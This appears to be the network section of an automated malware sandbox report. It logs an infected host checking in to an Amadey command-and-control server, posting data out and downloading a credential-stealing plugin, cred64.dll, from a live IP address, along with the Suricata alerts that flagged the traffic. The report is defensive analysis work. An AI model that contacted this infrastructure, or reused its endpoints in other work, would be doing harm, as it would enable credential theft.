Network Analysis
| IP Address | Status | Action |
|---|---|---|
| 62.204.41.79 | Active | Moloch |
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| No hosts contacted. | ||
POST
200
http://62.204.41.79/fb73jc3/index.php?scr=1
REQUEST
RESPONSE
BODY
POST /fb73jc3/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----ODcwMTU=
Host: 62.204.41.79
Content-Length: 87167
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 14 Dec 2022 00:47:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://62.204.41.79/fb73jc3/index.php
REQUEST
RESPONSE
BODY
POST /fb73jc3/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.79
Content-Length: 90
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 14 Dec 2022 00:47:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://62.204.41.79/fb73jc3/Plugins/cred64.dll
REQUEST
RESPONSE
BODY
GET /fb73jc3/Plugins/cred64.dll HTTP/1.1
Host: 62.204.41.79
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 14 Dec 2022 00:47:57 GMT
Content-Type: application/octet-stream
Content-Length: 129024
Last-Modified: Tue, 13 Dec 2022 14:34:04 GMT
Connection: keep-alive
ETag: "63988d5c-1f800"
Accept-Ranges: bytes
POST
200
http://62.204.41.79/fb73jc3/index.php
REQUEST
RESPONSE
BODY
POST /fb73jc3/index.php HTTP/1.1
Host: 62.204.41.79
Content-Length: 21
Content-Type: application/x-www-form-urlencoded
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 14 Dec 2022 00:47:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 62.204.41.79:80 -> 192.168.56.103:49171 | 2402000 | ET DROP Dshield Block Listed Source group 1 | Misc Attack |
| TCP 192.168.56.103:49172 -> 62.204.41.79:80 | 2027700 | ET MALWARE Amadey CnC Check-In | Malware Command and Control Activity Detected |
| TCP 192.168.56.103:49175 -> 62.204.41.79:80 | 2027250 | ET INFO Dotted Quad Host DLL Request | Potentially Bad Traffic |
| TCP 62.204.41.79:80 -> 192.168.56.103:49175 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
| TCP 62.204.41.79:80 -> 192.168.56.103:49175 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts